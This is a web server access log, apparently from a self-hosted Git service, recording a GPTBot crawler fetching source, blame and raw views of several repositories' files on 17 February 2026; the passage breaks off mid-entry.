"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm" -[17/Feb/2026:14:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?files=asset_pilot_docker%2fmain.py" [Client 74.7.227.38] [Length 34479] [Gzip 7.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" -[17/Feb/2026:14:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fstatic%2fjs" [Client 74.7.227.38] [Length 54110] [Gzip 9.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js" -[17/Feb/2026:14:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15614] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build" -[17/Feb/2026:14:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15616] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build" -[17/Feb/2026:14:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15618] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build" -[17/Feb/2026:14:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15590] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build" -[17/Feb/2026:14:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" -[17/Feb/2026:14:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" -[17/Feb/2026:14:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11473] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" -[17/Feb/2026:14:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts?display=source" [Client 74.7.227.38] [Length 11500] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" -[17/Feb/2026:14:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" -[17/Feb/2026:14:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" -[17/Feb/2026:14:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" [Client 74.7.227.38] [Length 11045] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" -[17/Feb/2026:14:48:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16085] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:14:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16085] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:14:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16085] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:14:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16055] [Gzip 9.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:14:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:14:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:14:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:14:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:14:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" [Client 74.7.227.38] [Length 11045] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" -[17/Feb/2026:14:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" [Client 74.7.227.38] [Length 11045] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" -[17/Feb/2026:14:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" -[17/Feb/2026:14:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" -[17/Feb/2026:14:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" [Client 74.7.227.38] [Length 9854] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" -[17/Feb/2026:14:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" -[17/Feb/2026:14:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" -[17/Feb/2026:14:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 9908] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:14:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:14:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 14919] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" -[17/Feb/2026:14:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 14888] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" -[17/Feb/2026:14:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" -[17/Feb/2026:14:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" -[17/Feb/2026:14:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" -[17/Feb/2026:14:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" -[17/Feb/2026:14:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11404] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" -[17/Feb/2026:14:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" [Client 74.7.227.38] [Length 11698] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:14:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" [Client 74.7.227.38] [Length 11093] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:14:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2fassets%2fjs" [Client 74.7.227.38] [Length 48025] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" -[17/Feb/2026:14:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fobj%2fproject.nuget.cache" [Client 74.7.227.38] [Length 22754] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:14:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 15266] [Gzip 8.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" -[17/Feb/2026:14:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 15232] [Gzip 8.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" -[17/Feb/2026:14:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" -[17/Feb/2026:14:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" -[17/Feb/2026:14:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" -[17/Feb/2026:14:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" -[17/Feb/2026:14:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9930] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" -[17/Feb/2026:14:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" -[17/Feb/2026:14:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" [Client 74.7.227.38] [Length 10979] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/package.json" -[17/Feb/2026:14:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" [Client 74.7.227.38] [Length 10118] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" -[17/Feb/2026:14:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" [Client 74.7.227.38] [Length 10386] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" -[17/Feb/2026:14:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" -[17/Feb/2026:14:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10466] [Gzip 3.05] [Sent-to 